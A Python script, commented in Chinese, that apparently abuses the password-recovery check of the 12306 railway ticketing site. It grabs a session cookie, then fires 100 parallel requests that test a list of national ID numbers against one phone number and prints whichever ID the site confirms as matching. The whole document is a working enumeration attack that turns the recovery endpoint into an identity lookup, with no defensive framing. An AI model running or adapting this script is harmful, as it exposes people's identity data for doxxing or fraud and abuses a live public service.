import requests
import concurrent.futures
import time

# 先获取一次Cookie
url_cookie = "https://kyfw.12306.cn/otn/forgetPassword/initforgetMyPassword"
response_cookie = requests.get(url_cookie)
cookies_jar = response_cookie.cookies
cookies_dict = requests.utils.dict_from_cookiejar(cookies_jar)
cookie_str = "JSESSIONID={}; cursorStatus=off; guidesStatus=off; highContrastMode=defaltMode; BIGipServerotn={}; route={}".format(
    cookies_dict.get('JSESSIONID'), cookies_dict.get('BIGipServerotn'), cookies_dict.get('route'))
print("已自动获取到cookie,请继续操作")

# 获取用户输入的手机号
phone_number = input("请输入手机号: ")

# 获取包含证件号码的文件路径
file_path = input("请输入包含证件号码的文件路径: ")

# 读取文件中的证件号码列表
with open(file_path, 'r') as file:
    id_numbers = file.read().splitlines()

headers = {
    'User-Agent': "Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1",
    'Accept': "application/json, text/javascript, */*; q=0.01",
    'X-Requested-With': "XMLHttpRequest",
    'Sec-Fetch-Site': "same-origin",
    'Accept-Language': "zh-CN,zh-Hans;q=0.9",
    'Sec-Fetch-Mode': "cors",
    'Origin': "https://kyfw.12306.cn",
    'Referer': "https://kyfw.12306.cn/otn/forgetPassword/initforgetMyPassword",
    'Sec-Fetch-Dest': "empty",
    'Cookie': cookie_str
}

url_check = "https://kyfw.12306.cn/otn/forgetPassword/checkUserInfo"


def check_info(phone, id_number):
    payload = {
        'mobile_no': phone,
        'loginUserDTO.mobile_code': "86",
        'loginUserDTO.id_type_code': "1",
        'loginUserDTO.id_no': id_number
    }
    try:
        response = requests.post(url_check, data=payload, headers=headers)
        if "不正确" not in response.text:
            return f"{phone}-{id_number}核验一致✅"
        else:
            return None
    except requests.RequestException as e:
        print(f"请求出现异常: {e}")
        return None


start_time = time.time()
results = []
# 创建线程池,最大工作线程数可根据实际情况调整,这里设置为100
with concurrent.futures.ThreadPoolExecutor(max_workers=100) as executor:
    futures = [executor.submit(check_info, phone_number, id_num) for id_num in id_numbers]
    for future in concurrent.futures.as_completed(futures):
        result = future.result()
        if result:
            results.append(result)

end_time = time.time()
elapsed_time = end_time - start_time

print("正确结果:")
for result in results:
    print(result)
print(f"耗时{elapsed_time:.2f}")
